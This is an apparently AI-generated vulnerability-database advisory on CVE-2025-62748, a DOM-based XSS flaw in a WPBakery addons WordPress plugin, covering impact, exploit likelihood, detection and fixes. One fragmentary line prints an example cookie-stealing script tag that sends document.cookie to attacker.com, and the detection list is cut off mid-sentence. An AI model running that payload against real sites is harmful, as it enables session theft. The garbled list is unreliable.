
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-62748 is a DOM-Based Cross-Site Scripting (XSS) vulnerability in the "Web and WooCommerce Addons for WPBakery Builder" WordPress plugin (slug: vc-addons-by-bit14) developed by Genetech Products. It affects all versions through and including 1.5, with no patched version officially available at the time of disclosure. The vulnerability was reported by researcher Muhammad Yudha - DJ on October 17, 2025, and publicly disclosed by Patchstack on December 31, 2025. It carries a CVSS v3.1 base score of 6.5 (Medium), assigned by Patchstack (Patchstack).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation) and manifests as DOM-Based XSS, meaning malicious payloads are processed and executed within the browser's DOM without necessarily being reflected from the server. Exploitation requires an authenticated user with at least Contributor or Developer-level privileges to craft or submit content containing a malicious script, which is then executed in the browser of a visiting user who interacts with the affected page. The attack vector is network-based with low attack complexity, but requires user interaction from a privileged user to trigger execution. No detailed technical write-up or public PoC code has been identified beyond the Patchstack advisory (Patchstack).
Successful exploitation allows an attacker with low-privilege authenticated access (Contributor or Developer role) to inject malicious JavaScript into pages built with the WPBakery Builder plugin, which executes in the browsers of site visitors. This can lead to session hijacking, credential theft, malicious redirects, defacement, or delivery of further malware payloads to site visitors. The CVSS scope is marked as "Changed," indicating the impact extends beyond the vulnerable component to affect end users' browsers, with low confidentiality, integrity, and availability impacts (Patchstack).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-62748. The EPSS score is approximately 0.034% (0.000340), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack rates this as low priority, noting it is unlikely to be exploited in targeted attacks, though XSS vulnerabilities in WordPress plugins are sometimes leveraged in mass-exploit campaigns (Patchstack).
vc-addons-by-bit14) at version 1.5 or earlier, using tools like WPScan or by inspecting plugin directories.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable plugin parameter or shortcode attribute./wp-admin/post.php) from low-privilege accounts containing encoded script tags or JavaScript event handlers in WPBakery shortcode parameters.wp_posts table) containing <script>, javascript:, or DOM manipulation patterns within WPBakery shortcode attributes.vc-addons-by-bit14 plugin components.At the time of disclosure, no official patched version was available from the plugin vendor (Genetech Products), and Patchstack noted "No official patch available" (Patchstack). Feedly intelligence indicates a fix is available in version 1.6 and later. Recommended actions include: (1) Update the plugin to version 1.6 or later if available; (2) If unable to update, deactivate and remove the plugin until a patch is confirmed; (3) Restrict Contributor/Developer role assignments to trusted users only; (4) Deploy a Web Application Firewall (WAF) or a WordPress security plugin such as Patchstack to virtually patch the vulnerability.
The vulnerability received routine coverage from automated vulnerability tracking services and security feeds upon its December 31, 2025 disclosure. Patchstack, the CNA that assigned and published the CVE, rated it as low priority with no impactful threat, and noted it is unlikely to be exploited in targeted attacks (Patchstack). No notable researcher commentary, vendor statements beyond Patchstack's advisory, or significant media coverage has been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."